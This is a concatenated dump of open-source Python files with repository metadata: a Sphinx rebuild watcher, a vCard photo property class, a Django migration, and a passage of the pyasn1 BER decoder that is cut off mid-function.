        return "%s. Output was:\n%s" % (base, self.output.strip())
"content_hash": "14025868d8b57d7f024f26f182a1ee06",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 73,
"avg_line_length": 35.07692307692308,
"alnum_prop": 0.6425438596491229,
"repo_name": "adamcharnock/seed",
"id": "3ee6cba52e85dde2f496531a3494aa6a1c8e0d7f",
"size": "457",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "seed/exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "302622"
}
],
"symlink_target": ""
} |
import os
import time
from glob import glob
from collections import defaultdict
if __name__ == '__main__':
    # Last-seen modification time per .rst file; unseen files map to None,
    # so every file counts as "changed" on the first pass.
    mtimes = defaultdict(lambda: None)
    while True:
        changed = False
        for path in glob('*.rst'):
            current = os.stat(path).st_mtime
            if current != mtimes[path]:
                changed = True
                mtimes[path] = current
        if changed:
            # Rebuild the Sphinx docs whenever any source file was touched.
            os.system('make clean')
            os.system('make html')
        time.sleep(1)
| {
"content_hash": "a01c0568a1e90fc602bc49076a3578c0",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 39,
"avg_line_length": 22.181818181818183,
"alnum_prop": 0.48155737704918034,
"repo_name": "consec/ConSec",
"id": "c652351de75544dfbb43d07acc559208bcadabc5",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "federation-web/docs/watch.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "5112"
},
{
"name": "CSS",
"bytes": "262571"
},
{
"name": "Cucumber",
"bytes": "15685"
},
{
"name": "HTML",
"bytes": "76686"
},
{
"name": "Java",
"bytes": "1268727"
},
{
"name": "JavaScript",
"bytes": "1158778"
},
{
"name": "Makefile",
"bytes": "6919"
},
{
"name": "PHP",
"bytes": "2878790"
},
{
"name": "Perl",
"bytes": "48337"
},
{
"name": "Python",
"bytes": "298646"
},
{
"name": "Ruby",
"bytes": "7994"
},
{
"name": "Shell",
"bytes": "22042"
}
],
"symlink_target": ""
} |
from functools import partial
from ..params.encodings import EncodingParam
from ..params.values import URLParam
from .base import StringProp
__all__ = ["PhotoProp"]
class PhotoProp(StringProp):
    """PHOTO property of a vCard: holds (possibly encoded) image data.

    NOTE(review): ``import`` is a reserved keyword, so the original
    ``def import(self, path)`` was a SyntaxError and this module could not be
    imported at all. The method is renamed ``import_`` per the PEP 8
    convention for keyword clashes; no caller can have depended on the old
    name since the old name never compiled.
    """
    authorized_params = ["ENCODING", "TYPE", "VALUE"]
    name = "PHOTO"
    def export(self, path):
        """Export value to a file.

        Not implemented yet.
        """
        pass
    def import_(self, path):
        """Import a file to the value.

        Reads the file at *path* (a ``pathlib.Path``-like object) and stores
        its encoded content as this property's value. Does nothing when the
        value is a URL reference. Raises ValueError when zero or more than one
        encoding parameter is declared, FileNotFoundError when *path* is
        missing.
        """
        if URLParam in self.params:
            ## Do not import.
            return
        ## Check and get encodings.
        encoders = {p for p in self.params if isinstance(p, EncodingParam)}
        if len(encoders) == 0:
            raise ValueError("No encoding found.")
        elif len(encoders) > 1:
            raise ValueError("More than one encoding, ambigous.")
        # BUGFIX: sets are not iterators, so ``next(encoders)`` raised
        # TypeError; wrap in iter() to take the single element.
        encoder = next(iter(encoders))
        ## Check path.
        if not path.exists():
            raise FileNotFoundError( str(path) )
        ## TODO: Check file extension.
        ## Do import.
        with path.open("rb") as file:
            self.value = encoder.encode(file.read())
| {
"content_hash": "fe30045c3494d787e31458c13b1f306e",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 75,
"avg_line_length": 25.837209302325583,
"alnum_prop": 0.5733573357335734,
"repo_name": "Jorispilot/pycard",
"id": "b32f33a531f0049b46183249705db956f034e619",
"size": "1111",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pycard/prop/photo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "23091"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional free-form ``tags`` text column to ``event.Session``."""
    # Must apply after the app's initial schema migration.
    dependencies = [
        ('event', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='session',
            name='tags',
            # blank=True/null=True: the column is optional both at the form
            # and database level.
            field=models.TextField(blank=True, null=True),
        ),
    ]
| {
"content_hash": "d1e7912cbb26cee7fe63667c51108a5c",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 58,
"avg_line_length": 20.555555555555557,
"alnum_prop": 0.581081081081081,
"repo_name": "pytexas/PyTexasBackend",
"id": "b7a7199b302fb2d92b59744a2a71d31e445b3ad5",
"size": "443",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conference/event/migrations/0002_session_tags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1680"
},
{
"name": "HTML",
"bytes": "4339"
},
{
"name": "JavaScript",
"bytes": "12017"
},
{
"name": "Python",
"bytes": "16982"
},
{
"name": "Shell",
"bytes": "273"
},
{
"name": "Vue",
"bytes": "10974"
}
],
"symlink_target": ""
} |
from pyasn1 import debug
from pyasn1 import error
from pyasn1.codec.ber import eoo
from pyasn1.compat.integer import from_bytes
from pyasn1.compat.octets import oct2int, octs2ints, ints2octs, null
from pyasn1.type import base
from pyasn1.type import char
from pyasn1.type import tag
from pyasn1.type import tagmap
from pyasn1.type import univ
from pyasn1.type import useful
__all__ = ['decode']
# Debug logger for the decoder; usage below (`if LOG: LOG(...)`) shows it is
# callable when DEBUG_DECODER tracing is enabled and falsy otherwise.
LOG = debug.registerLoggee(__name__, flags=debug.DEBUG_DECODER)
# Sentinel distinguishing "no value supplied" from a legitimate None value.
noValue = base.noValue
class AbstractDecoder(object):
    """Base class of all BER value decoders.

    Subclasses override `valueDecoder` (definite-length encodings) and,
    where the type supports it, `indefLenValueDecoder` (indefinite-length
    encodings). Both default implementations simply raise.
    """
    # Prototype ASN.1 object used when the caller passes no `asn1Spec`;
    # set by concrete subclasses.
    protoComponent = None
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        raise error.PyAsn1Error('Decoder not implemented for %s' % (tagSet,))
    def indefLenValueDecoder(self, substrate, asn1Spec,
                             tagSet=None, length=None, state=None,
                             decodeFun=None, substrateFun=None,
                             **options):
        raise error.PyAsn1Error('Indefinite length mode decoder not implemented for %s' % (tagSet,))
class AbstractSimpleDecoder(AbstractDecoder):
    """Shared machinery for decoders of simple (non-constructed) types."""
    @staticmethod
    def substrateCollector(asn1Object, substrate, length):
        # Split exactly `length` octets off the front of the substrate and
        # hand back (collected, remainder).
        return substrate[:length], substrate[length:]
    def _createComponent(self, asn1Spec, tagSet, value, **options):
        """Build the Python/ASN.1 object to return for a decoded value."""
        # Native mode: hand back the raw Python value untouched.
        if options.get('native'):
            return value
        # No spec given: clone the prototype, carrying the observed tags.
        if asn1Spec is None:
            return self.protoComponent.clone(value, tagSet=tagSet)
        # Spec given but no value decoded: return the spec itself.
        if value is noValue:
            return asn1Spec
        return asn1Spec.clone(value)
class ExplicitTagDecoder(AbstractSimpleDecoder):
    """Unwrap an explicitly tagged value and decode its inner content."""
    protoComponent = univ.Any('')
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Decode a definite-length explicitly tagged value.

        Returns (inner component, unconsumed substrate). Any payload left
        inside the wrapper after the inner value is discarded (logged when
        tracing is on).
        """
        if substrateFun:
            return substrateFun(
                self._createComponent(asn1Spec, tagSet, '', **options),
                substrate, length
            )
        head, tail = substrate[:length], substrate[length:]
        value, _ = decodeFun(head, asn1Spec, tagSet, length, **options)
        if LOG:
            LOG('explicit tag container carries %d octets of trailing payload '
                '(will be lost!): %s' % (len(_), debug.hexdump(_)))
        return value, tail
    def indefLenValueDecoder(self, substrate, asn1Spec,
                             tagSet=None, length=None, state=None,
                             decodeFun=None, substrateFun=None,
                             **options):
        """Decode an indefinite-length explicitly tagged value.

        The inner value must be followed by an end-of-octets marker, else
        PyAsn1Error is raised.
        """
        if substrateFun:
            return substrateFun(
                self._createComponent(asn1Spec, tagSet, '', **options),
                substrate, length
            )
        value, substrate = decodeFun(substrate, asn1Spec, tagSet, length, **options)
        eooMarker, substrate = decodeFun(substrate, allowEoo=True, **options)
        if eooMarker is eoo.endOfOctets:
            return value, substrate
        else:
            raise error.PyAsn1Error('Missing end-of-octets terminator')
# Module-level singleton; presumably referenced by the decoder state machine
# further down the file (usage not visible in this chunk).
explicitTagDecoder = ExplicitTagDecoder()
class IntegerDecoder(AbstractSimpleDecoder):
    """Decode BER-encoded INTEGER (and, via tagMap, ENUMERATED) values."""
    protoComponent = univ.Integer(0)
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Consume `length` octets and return (Integer component, remainder)."""
        if tagSet[0].tagFormat != tag.tagFormatSimple:
            raise error.PyAsn1Error('Simple tag format expected')
        chunk, remainder = substrate[:length], substrate[length:]
        # Zero-length content decodes to zero; otherwise interpret the
        # octets as a big-endian two's-complement integer.
        value = from_bytes(chunk, signed=True) if chunk else 0
        return self._createComponent(asn1Spec, tagSet, value, **options), remainder
class BooleanDecoder(IntegerDecoder):
    """Decode BER BOOLEAN by reusing the INTEGER decoder and normalizing
    the decoded content to 1 (true) or 0 (false)."""
    protoComponent = univ.Boolean(0)
    def _createComponent(self, asn1Spec, tagSet, value, **options):
        flag = 1 if value else 0
        return IntegerDecoder._createComponent(
            self, asn1Spec, tagSet, flag, **options)
class BitStringDecoder(AbstractSimpleDecoder):
    """Decode BER BIT STRING in both primitive and constructed forms.

    In the primitive form the first content octet gives the number of unused
    (padding) bits in the last octet; the constructed form concatenates
    inner fragments.
    """
    protoComponent = univ.BitString(())
    # Constructed (fragmented) encoding is legal in BER; subclasses/profiles
    # may disable it.
    supportConstructedForm = True
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Decode a definite-length BIT STRING."""
        head, tail = substrate[:length], substrate[length:]
        if substrateFun:
            return substrateFun(self._createComponent(
                asn1Spec, tagSet, noValue, **options), substrate, length)
        if not head:
            raise error.PyAsn1Error('Empty BIT STRING substrate')
        if tagSet[0].tagFormat == tag.tagFormatSimple:  # XXX what tag to check?
            # Primitive form: first octet = count of unused trailing bits.
            trailingBits = oct2int(head[0])
            if trailingBits > 7:
                raise error.PyAsn1Error(
                    'Trailing bits overflow %s' % trailingBits
                )
            value = self.protoComponent.fromOctetString(
                head[1:], internalFormat=True, padding=trailingBits)
            return self._createComponent(asn1Spec, tagSet, value, **options), tail
        if not self.supportConstructedForm:
            raise error.PyAsn1Error('Constructed encoding form prohibited '
                                    'at %s' % self.__class__.__name__)
        if LOG:
            LOG('assembling constructed serialization')
        # All inner fragments are of the same type, treat them as octet string
        substrateFun = self.substrateCollector
        bitString = self.protoComponent.fromOctetString(null, internalFormat=True)
        while head:
            component, head = decodeFun(head, self.protoComponent,
                                        substrateFun=substrateFun, **options)
            trailingBits = oct2int(component[0])
            if trailingBits > 7:
                raise error.PyAsn1Error(
                    'Trailing bits overflow %s' % trailingBits
                )
            bitString = self.protoComponent.fromOctetString(
                component[1:], internalFormat=True,
                prepend=bitString, padding=trailingBits
            )
        return self._createComponent(asn1Spec, tagSet, bitString, **options), tail
    def indefLenValueDecoder(self, substrate, asn1Spec,
                             tagSet=None, length=None, state=None,
                             decodeFun=None, substrateFun=None,
                             **options):
        """Decode an indefinite-length (necessarily constructed) BIT STRING."""
        if substrateFun:
            return substrateFun(self._createComponent(asn1Spec, tagSet, noValue, **options), substrate, length)
        # All inner fragments are of the same type, treat them as octet string
        substrateFun = self.substrateCollector
        bitString = self.protoComponent.fromOctetString(null, internalFormat=True)
        while substrate:
            component, substrate = decodeFun(substrate, self.protoComponent,
                                             substrateFun=substrateFun,
                                             allowEoo=True, **options)
            if component is eoo.endOfOctets:
                break
            trailingBits = oct2int(component[0])
            if trailingBits > 7:
                raise error.PyAsn1Error(
                    'Trailing bits overflow %s' % trailingBits
                )
            bitString = self.protoComponent.fromOctetString(
                component[1:], internalFormat=True,
                prepend=bitString, padding=trailingBits
            )
        else:
            # while-else: substrate ran out without an EOO marker.
            raise error.SubstrateUnderrunError('No EOO seen before substrate ends')
        return self._createComponent(asn1Spec, tagSet, bitString, **options), substrate
class OctetStringDecoder(AbstractSimpleDecoder):
    """Decode BER OCTET STRING in primitive and constructed forms.

    Also the base for all character-string and time-type decoders below.
    """
    protoComponent = univ.OctetString('')
    # Constructed (fragmented) encoding is legal in BER.
    supportConstructedForm = True
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Decode a definite-length OCTET STRING."""
        head, tail = substrate[:length], substrate[length:]
        if substrateFun:
            return substrateFun(self._createComponent(asn1Spec, tagSet, noValue, **options),
                                substrate, length)
        if tagSet[0].tagFormat == tag.tagFormatSimple:  # XXX what tag to check?
            # Primitive form: content octets are the value as-is.
            return self._createComponent(asn1Spec, tagSet, head, **options), tail
        if not self.supportConstructedForm:
            raise error.PyAsn1Error('Constructed encoding form prohibited at %s' % self.__class__.__name__)
        if LOG:
            LOG('assembling constructed serialization')
        # All inner fragments are of the same type, treat them as octet string
        substrateFun = self.substrateCollector
        header = null
        while head:
            component, head = decodeFun(head, self.protoComponent,
                                        substrateFun=substrateFun,
                                        **options)
            header += component
        return self._createComponent(asn1Spec, tagSet, header, **options), tail
    def indefLenValueDecoder(self, substrate, asn1Spec,
                             tagSet=None, length=None, state=None,
                             decodeFun=None, substrateFun=None,
                             **options):
        """Decode an indefinite-length (constructed) OCTET STRING."""
        if substrateFun and substrateFun is not self.substrateCollector:
            asn1Object = self._createComponent(asn1Spec, tagSet, noValue, **options)
            return substrateFun(asn1Object, substrate, length)
        # All inner fragments are of the same type, treat them as octet string
        substrateFun = self.substrateCollector
        header = null
        while substrate:
            component, substrate = decodeFun(substrate,
                                             self.protoComponent,
                                             substrateFun=substrateFun,
                                             allowEoo=True, **options)
            if component is eoo.endOfOctets:
                break
            header += component
        else:
            # while-else: substrate ran out without an EOO marker.
            raise error.SubstrateUnderrunError(
                'No EOO seen before substrate ends'
            )
        return self._createComponent(asn1Spec, tagSet, header, **options), substrate
class NullDecoder(AbstractSimpleDecoder):
    """Decoder for ASN.1 NULL, whose encoding carries no content octets."""
    protoComponent = univ.Null('')
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Return (NULL component, remainder after `length` octets)."""
        if tagSet[0].tagFormat != tag.tagFormatSimple:
            raise error.PyAsn1Error('Simple tag format expected')
        content, remainder = substrate[:length], substrate[length:]
        component = self._createComponent(asn1Spec, tagSet, '', **options)
        # NULL must be encoded with zero content octets.
        if content:
            raise error.PyAsn1Error('Unexpected %d-octet substrate for Null' % length)
        return component, remainder
class ObjectIdentifierDecoder(AbstractSimpleDecoder):
    """Decode BER OBJECT IDENTIFIER content into a tuple of integer arcs."""
    protoComponent = univ.ObjectIdentifier(())
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Decode base-128 sub-identifiers, then split the combined first
        sub-identifier into the two leading arcs per X.690."""
        if tagSet[0].tagFormat != tag.tagFormatSimple:
            raise error.PyAsn1Error('Simple tag format expected')
        head, tail = substrate[:length], substrate[length:]
        if not head:
            raise error.PyAsn1Error('Empty substrate')
        head = octs2ints(head)
        oid = ()
        index = 0
        substrateLen = len(head)
        while index < substrateLen:
            subId = head[index]
            index += 1
            if subId < 128:
                # Single-octet sub-identifier (high bit clear).
                oid += (subId,)
            elif subId > 128:
                # Construct subid from a number of octets
                nextSubId = subId
                subId = 0
                while nextSubId >= 128:
                    # Accumulate 7 value bits per octet while the
                    # continuation (high) bit is set.
                    subId = (subId << 7) + (nextSubId & 0x7F)
                    if index >= substrateLen:
                        raise error.SubstrateUnderrunError(
                            'Short substrate for sub-OID past %s' % (oid,)
                        )
                    nextSubId = head[index]
                    index += 1
                oid += ((subId << 7) + nextSubId,)
            elif subId == 128:
                # ASN.1 spec forbids leading zeros (0x80) in OID
                # encoding, tolerating it opens a vulnerability. See
                # https://www.esat.kuleuven.be/cosic/publications/article-1432.pdf
                # page 7
                raise error.PyAsn1Error('Invalid octet 0x80 in OID encoding')
        # Decode two leading arcs
        if 0 <= oid[0] <= 39:
            oid = (0,) + oid
        elif 40 <= oid[0] <= 79:
            oid = (1, oid[0] - 40) + oid[1:]
        elif oid[0] >= 80:
            oid = (2, oid[0] - 80) + oid[1:]
        else:
            raise error.PyAsn1Error('Malformed first OID octet: %s' % head[0])
        return self._createComponent(asn1Spec, tagSet, oid, **options), tail
class RealDecoder(AbstractSimpleDecoder):
    """Decode BER REAL: binary, character (NR1/NR2/NR3) and special-value
    encodings, selected by the leading format octet."""
    protoComponent = univ.Real()
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Dissect the format octet, then the exponent and mantissa (binary
        form) or the textual number (character form)."""
        if tagSet[0].tagFormat != tag.tagFormatSimple:
            raise error.PyAsn1Error('Simple tag format expected')
        head, tail = substrate[:length], substrate[length:]
        if not head:
            # Zero-length content encodes the value 0.
            return self._createComponent(asn1Spec, tagSet, 0.0, **options), tail
        fo = oct2int(head[0])
        head = head[1:]
        if fo & 0x80:  # binary encoding
            if not head:
                raise error.PyAsn1Error("Incomplete floating-point value")
            if LOG:
                LOG('decoding binary encoded REAL')
            # Low two bits select exponent length (1-3 octets, or explicit).
            n = (fo & 0x03) + 1
            if n == 4:
                n = oct2int(head[0])
                head = head[1:]
            eo, head = head[:n], head[n:]
            if not eo or not head:
                raise error.PyAsn1Error('Real exponent screwed')
            e = oct2int(eo[0]) & 0x80 and -1 or 0
            while eo:  # exponent
                e <<= 8
                e |= oct2int(eo[0])
                eo = eo[1:]
            b = fo >> 4 & 0x03  # base bits
            if b > 2:
                raise error.PyAsn1Error('Illegal Real base')
            if b == 1:  # encbase = 8
                e *= 3
            elif b == 2:  # encbase = 16
                e *= 4
            p = 0
            while head:  # value
                p <<= 8
                p |= oct2int(head[0])
                head = head[1:]
            if fo & 0x40:  # sign bit
                p = -p
            sf = fo >> 2 & 0x03  # scale bits
            p *= 2 ** sf
            # Value is represented as the (mantissa, base, exponent) triple.
            value = (p, 2, e)
        elif fo & 0x40:  # infinite value
            if LOG:
                LOG('decoding infinite REAL')
            value = fo & 0x01 and '-inf' or 'inf'
        elif fo & 0xc0 == 0:  # character encoding
            if not head:
                raise error.PyAsn1Error("Incomplete floating-point value")
            if LOG:
                LOG('decoding character encoded REAL')
            try:
                if fo & 0x3 == 0x1:  # NR1
                    value = (int(head), 10, 0)
                elif fo & 0x3 == 0x2:  # NR2
                    value = float(head)
                elif fo & 0x3 == 0x3:  # NR3
                    value = float(head)
                else:
                    raise error.SubstrateUnderrunError(
                        'Unknown NR (tag %s)' % fo
                    )
            except ValueError:
                raise error.SubstrateUnderrunError(
                    'Bad character Real syntax'
                )
        else:
            raise error.SubstrateUnderrunError(
                'Unknown encoding (tag %s)' % fo
            )
        return self._createComponent(asn1Spec, tagSet, value, **options), tail
class AbstractConstructedDecoder(AbstractDecoder):
    """Marker base class for decoders of constructed (container) types."""
    protoComponent = None
class UniversalConstructedTypeDecoder(AbstractConstructedDecoder):
    """Shared decoder for SEQUENCE/SET and SEQUENCE OF/SET OF.

    With an `asn1Spec` it decodes components against the spec's named types
    (including open-type resolution); without one it decodes blindly and
    guesses the container kind from the component tag diversity.
    """
    # Prototypes used when guessing: record = SEQUENCE/SET, sequence = *-OF.
    protoRecordComponent = None
    protoSequenceComponent = None
    def _getComponentTagMap(self, asn1Object, idx):
        # Subclass hook (not used in this chunk).
        raise NotImplementedError()
    def _getComponentPositionByType(self, asn1Object, tagSet, idx):
        # Subclass hook (not used in this chunk).
        raise NotImplementedError()
    def _decodeComponents(self, substrate, tagSet=None, decodeFun=None, **options):
        """Spec-less decode: consume components until the substrate (or an
        EOO marker, when the caller allows it) ends, then guess the
        container type and populate it."""
        components = []
        componentTypes = set()
        while substrate:
            component, substrate = decodeFun(substrate, **options)
            if component is eoo.endOfOctets:
                break
            components.append(component)
            componentTypes.add(component.tagSet)
        # Now we have to guess is it SEQUENCE/SET or SEQUENCE OF/SET OF
        # The heuristics is:
        # * 1+ components of different types -> likely SEQUENCE/SET
        # * otherwise -> likely SEQUENCE OF/SET OF
        if len(componentTypes) > 1:
            protoComponent = self.protoRecordComponent
        else:
            protoComponent = self.protoSequenceComponent
        asn1Object = protoComponent.clone(
            # construct tagSet from base tag from prototype ASN.1 object
            # and additional tags recovered from the substrate
            tagSet=tag.TagSet(protoComponent.tagSet.baseTag, *tagSet.superTags)
        )
        if LOG:
            LOG('guessed %r container type (pass `asn1Spec` to guide the '
                'decoder)' % asn1Object)
        for idx, component in enumerate(components):
            asn1Object.setComponentByPosition(
                idx, component,
                verifyConstraints=False,
                matchTags=False, matchConstraints=False
            )
        return asn1Object, substrate
    def valueDecoder(self, substrate, asn1Spec,
                     tagSet=None, length=None, state=None,
                     decodeFun=None, substrateFun=None,
                     **options):
        """Decode a definite-length constructed value."""
        if tagSet[0].tagFormat != tag.tagFormatConstructed:
            raise error.PyAsn1Error('Constructed tag format expected')
        head, tail = substrate[:length], substrate[length:]
        if substrateFun is not None:
            if asn1Spec is not None:
                asn1Object = asn1Spec.clone()
            elif self.protoComponent is not None:
                asn1Object = self.protoComponent.clone(tagSet=tagSet)
            else:
                asn1Object = self.protoRecordComponent, self.protoSequenceComponent
            return substrateFun(asn1Object, substrate, length)
        if asn1Spec is None:
            # No spec: fall back to guess-based decoding.
            asn1Object, trailing = self._decodeComponents(
                head, tagSet=tagSet, decodeFun=decodeFun, **options
            )
            if trailing:
                if LOG:
                    LOG('Unused trailing %d octets encountered: %s' % (
                        len(trailing), debug.hexdump(trailing)))
            return asn1Object, tail
        asn1Object = asn1Spec.clone()
        asn1Object.clear()
        if asn1Spec.typeId in (univ.Sequence.typeId, univ.Set.typeId):
            # SEQUENCE/SET: match decoded components against named types.
            namedTypes = asn1Spec.componentType
            isSetType = asn1Spec.typeId == univ.Set.typeId
            # Deterministic = component order fully fixed by the schema.
            isDeterministic = not isSetType and not namedTypes.hasOptionalOrDefault
            if LOG:
                LOG('decoding %sdeterministic %s type %r chosen by type ID' % (
                    not isDeterministic and 'non-' or '', isSetType and 'SET' or '',
                    asn1Spec))
            seenIndices = set()
            idx = 0
            while head:
                if not namedTypes:
                    componentType = None
                elif isSetType:
                    # SET components may arrive in any order: use the tag map.
                    componentType = namedTypes.tagMapUnique
                else:
                    try:
                        if isDeterministic:
                            componentType = namedTypes[idx].asn1Object
                        elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
                            componentType = namedTypes.getTagMapNearPosition(idx)
                        else:
                            componentType = namedTypes[idx].asn1Object
                    except IndexError:
                        raise error.PyAsn1Error(
                            'Excessive components decoded at %r' % (asn1Spec,)
                        )
                component, head = decodeFun(head, componentType, **options)
                if not isDeterministic and namedTypes:
                    # Map the decoded component back to its schema position.
                    if isSetType:
                        idx = namedTypes.getPositionByType(component.effectiveTagSet)
                    elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
                        idx = namedTypes.getPositionNearType(component.effectiveTagSet, idx)
                asn1Object.setComponentByPosition(
                    idx, component,
                    verifyConstraints=False,
                    matchTags=False, matchConstraints=False
                )
                seenIndices.add(idx)
                idx += 1
            if LOG:
                LOG('seen component indices %s' % seenIndices)
            if namedTypes:
                if not namedTypes.requiredComponents.issubset(seenIndices):
                    raise error.PyAsn1Error(
                        'ASN.1 object %s has uninitialized '
                        'components' % asn1Object.__class__.__name__)
                if namedTypes.hasOpenTypes:
                    # Re-decode ANY-carried payloads whose concrete type is
                    # selected by a sibling "governing" component.
                    openTypes = options.get('openTypes', {})
                    if LOG:
                        LOG('using open types map: %r' % openTypes)
                    if openTypes or options.get('decodeOpenTypes', False):
                        for idx, namedType in enumerate(namedTypes.namedTypes):
                            if not namedType.openType:
                                continue
                            if namedType.isOptional and not asn1Object.getComponentByPosition(idx).isValue:
                                continue
                            governingValue = asn1Object.getComponentByName(
                                namedType.openType.name
                            )
                            try:
                                openType = openTypes[governingValue]
                            except KeyError:
                                try:
                                    openType = namedType.openType[governingValue]
                                except KeyError:
                                    if LOG:
                                        LOG('failed to resolve open type by governing '
                                            'value %r' % (governingValue,))
                                    continue
                            if LOG:
                                LOG('resolved open type %r by governing '
                                    'value %r' % (openType, governingValue))
                            containerValue = asn1Object.getComponentByPosition(idx)
                            if containerValue.typeId in (
                                    univ.SetOf.typeId, univ.SequenceOf.typeId):
                                for pos, containerElement in enumerate(
                                        containerValue):
                                    component, rest = decodeFun(
                                        containerValue[pos].asOctets(),
                                        asn1Spec=openType, **options
                                    )
                                    containerValue[pos] = component
                            else:
                                component, rest = decodeFun(
                                    asn1Object.getComponentByPosition(idx).asOctets(),
                                    asn1Spec=openType, **options
                                )
                                asn1Object.setComponentByPosition(idx, component)
            else:
                asn1Object.verifySizeSpec()
        else:
            # SEQUENCE OF/SET OF: all components share one type.
            asn1Object = asn1Spec.clone()
            asn1Object.clear()
            componentType = asn1Spec.componentType
            if LOG:
                LOG('decoding type %r chosen by given `asn1Spec`' % componentType)
            idx = 0
            while head:
                component, head = decodeFun(head, componentType, **options)
                asn1Object.setComponentByPosition(
                    idx, component,
                    verifyConstraints=False,
                    matchTags=False, matchConstraints=False
                )
                idx += 1
        return asn1Object, tail
    def indefLenValueDecoder(self, substrate, asn1Spec,
                             tagSet=None, length=None, state=None,
                             decodeFun=None, substrateFun=None,
                             **options):
        """Decode an indefinite-length constructed value; components are
        consumed until an end-of-octets marker."""
        if tagSet[0].tagFormat != tag.tagFormatConstructed:
            raise error.PyAsn1Error('Constructed tag format expected')
        if substrateFun is not None:
            if asn1Spec is not None:
                asn1Object = asn1Spec.clone()
            elif self.protoComponent is not None:
                asn1Object = self.protoComponent.clone(tagSet=tagSet)
            else:
                asn1Object = self.protoRecordComponent, self.protoSequenceComponent
            return substrateFun(asn1Object, substrate, length)
        if asn1Spec is None:
            return self._decodeComponents(
                substrate, tagSet=tagSet, decodeFun=decodeFun,
                **dict(options, allowEoo=True)
            )
        asn1Object = asn1Spec.clone()
        asn1Object.clear()
        if asn1Spec.typeId in (univ.Sequence.typeId, univ.Set.typeId):
            namedTypes = asn1Object.componentType
            isSetType = asn1Object.typeId == univ.Set.typeId
            isDeterministic = not isSetType and not namedTypes.hasOptionalOrDefault
            if LOG:
                LOG('decoding %sdeterministic %s type %r chosen by type ID' % (
                    not isDeterministic and 'non-' or '', isSetType and 'SET' or '',
                    asn1Spec))
            seenIndices = set()
            idx = 0
            while substrate:
                if len(namedTypes) <= idx:
                    asn1Spec = None
                elif isSetType:
                    asn1Spec = namedTypes.tagMapUnique
                else:
                    try:
                        if isDeterministic:
                            asn1Spec = namedTypes[idx].asn1Object
                        elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
                            asn1Spec = namedTypes.getTagMapNearPosition(idx)
                        else:
                            asn1Spec = namedTypes[idx].asn1Object
                    except IndexError:
                        raise error.PyAsn1Error(
                            'Excessive components decoded at %r' % (asn1Object,)
                        )
                component, substrate = decodeFun(substrate, asn1Spec, allowEoo=True, **options)
                if component is eoo.endOfOctets:
                    break
                if not isDeterministic and namedTypes:
                    if isSetType:
                        idx = namedTypes.getPositionByType(component.effectiveTagSet)
                    elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
                        idx = namedTypes.getPositionNearType(component.effectiveTagSet, idx)
                asn1Object.setComponentByPosition(
                    idx, component,
                    verifyConstraints=False,
                    matchTags=False, matchConstraints=False
                )
                seenIndices.add(idx)
                idx += 1
            else:
                # while-else: substrate ran out without an EOO marker.
                raise error.SubstrateUnderrunError(
                    'No EOO seen before substrate ends'
                )
            if LOG:
                LOG('seen component indices %s' % seenIndices)
            if namedTypes:
                if not namedTypes.requiredComponents.issubset(seenIndices):
                    raise error.PyAsn1Error('ASN.1 object %s has uninitialized components' % asn1Object.__class__.__name__)
                if namedTypes.hasOpenTypes:
                    # Open-type resolution, as in valueDecoder but allowing
                    # EOO inside the re-decoded payload.
                    openTypes = options.get('openTypes', {})
                    if LOG:
                        LOG('using open types map: %r' % openTypes)
                    if openTypes or options.get('decodeOpenTypes', False):
                        for idx, namedType in enumerate(namedTypes.namedTypes):
                            if not namedType.openType:
                                continue
                            if namedType.isOptional and not asn1Object.getComponentByPosition(idx).isValue:
                                continue
                            governingValue = asn1Object.getComponentByName(
                                namedType.openType.name
                            )
                            try:
                                openType = openTypes[governingValue]
                            except KeyError:
                                try:
                                    openType = namedType.openType[governingValue]
                                except KeyError:
                                    if LOG:
                                        LOG('failed to resolve open type by governing '
                                            'value %r' % (governingValue,))
                                    continue
                            if LOG:
                                LOG('resolved open type %r by governing '
                                    'value %r' % (openType, governingValue))
                            containerValue = asn1Object.getComponentByPosition(idx)
                            if containerValue.typeId in (
                                    univ.SetOf.typeId, univ.SequenceOf.typeId):
                                for pos, containerElement in enumerate(
                                        containerValue):
                                    component, rest = decodeFun(
                                        containerValue[pos].asOctets(),
                                        asn1Spec=openType, **dict(options, allowEoo=True)
                                    )
                                    containerValue[pos] = component
                            else:
                                component, rest = decodeFun(
